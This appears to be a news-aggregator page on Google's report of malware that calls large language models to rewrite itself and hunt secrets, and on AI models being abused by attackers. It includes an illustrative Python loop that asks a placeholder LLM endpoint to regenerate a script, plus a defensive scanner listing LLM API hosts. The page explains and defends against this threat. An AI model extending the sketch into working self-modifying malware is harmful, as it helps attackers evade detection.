Google Warns Criminals Are Building and Selling Illicit AI Tools - and the Market Is Growing
Google's Threat Intelligence Group found AI-powered malware that uses large language models to rewrite its own code on the fly, enabling evasion in real-world attacks observed in 2025.
- On Wednesday, Google's Threat Intelligence Group warned that malware can connect to large language models to refine attacks in real time, describing a 'just-in-time' self-modification technique (sketched after this list).
- Researchers found growing demand for malicious AI services on English- and Russian-language underground marketplaces, where developers aggressively promote AI features with API and Discord access.
- PromptFlux periodically queried Gemini through a 'Thinking Robot' module to generate obfuscated VBScript, QuietVault used AI CLI tools and prompts to hunt for secrets, and PromptSteal, deployed in attacks against Ukraine, queried the Qwen model to generate commands.
- Google disabled the associated accounts and assets and reinforced Gemini's safeguards, but faced skepticism from security researcher Marcus Hutchins, who said, "It doesn't specify what the code block should do, or how it's going to evade an antivirus."
- These cases suggest a broader shift in how adversaries use LLMs, with the North Korea-linked Masan group, Iranian actors, and reported abuse of Anthropic's Claude chatbot showing the threat spans multiple AI companies.
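To make the 'just-in-time' pattern concrete, here is a minimal sketch of the behavior GTIG describes: a long-running script that periodically sends a code-rewriting prompt to a generative-AI HTTP endpoint and receives fresh source in response. This is an illustration, not code from PromptFlux; the endpoint, model path, header, and JSON shape are assumptions modeled on common generative-API conventions, and the response is only logged, never executed.

```python
import json
import time
import urllib.request

# Hypothetical endpoint and key, for illustration only. A hardcoded API key
# inside a script is itself one of the hunting signals this pattern leaves.
API_URL = "https://llm-provider.invalid/v1/models/example-model:generateContent"
API_KEY = "REDACTED"

PROMPT = "Rewrite the following script so it behaves identically but looks different:\n..."

def query_llm(prompt: str) -> str:
    """Send one 'just-in-time' rewrite request and return the raw response body."""
    body = json.dumps({"contents": [{"parts": [{"text": prompt}]}]}).encode()
    req = urllib.request.Request(
        API_URL,
        data=body,
        headers={"Content-Type": "application/json", "x-api-key": API_KEY},
    )
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode()

# The periodic loop is the detectable part: regular outbound HTTPS POSTs to a
# generative-AI endpoint from a host that has no reason to make them.
while True:
    regenerated = query_llm(PROMPT)
    print(f"received {len(regenerated)} bytes")  # a real sample would persist and re-execute this
    time.sleep(3600)
```

The regular beaconing and the embedded key are exactly the kinds of artifacts defenders can hunt for in proxy logs and on disk.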
Insights by Ground AI
Google warns of new AI-powered malware families deployed in the wild
Google's Threat Intelligence Group (GTIG) has identified a major shift this year, with adversaries leveraging artificial intelligence to deploy new malware families that integrate large language models (LLMs) during execution. [...]
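Because the common thread across these families is a generative-AI endpoint baked into the sample, one straightforward hunting step is to scan script files for hardcoded LLM API hosts. The sketch below is a hypothetical illustration of that idea, not a tool from the report; the host watchlist and file extensions are assumptions to be tuned against real telemetry.

```python
import re
import sys
from pathlib import Path

# Assumed watchlist of generative-AI API hosts; extend it from your own
# proxy/DNS telemetry rather than treating this list as complete.
LLM_API_HOSTS = [
    "generativelanguage.googleapis.com",  # Gemini API
    "api-inference.huggingface.co",       # Hugging Face hosted inference
    "api.anthropic.com",                  # Claude API
]

PATTERN = re.compile("|".join(re.escape(h) for h in LLM_API_HOSTS).encode())
SCRIPT_EXTS = {".vbs", ".js", ".ps1", ".py"}

def scan(root: str) -> None:
    """Print script files under root that embed a watchlisted API host."""
    for path in Path(root).rglob("*"):
        if path.suffix.lower() not in SCRIPT_EXTS or not path.is_file():
            continue
        try:
            data = path.read_bytes()
        except OSError:
            continue
        for match in PATTERN.finditer(data):
            print(f"{path}: embeds {match.group().decode()}")

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else ".")
```

Saved as, say, scan_llm_hosts.py (a hypothetical name), it would be run against a directory of collected scripts: `python scan_llm_hosts.py /samples`.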
Coverage Details
Total News Sources: 15
Leaning Left: 2 | Leaning Right: 0 | Center: 2
Bias Distribution: 50% of rated sources lean Left, 50% are Center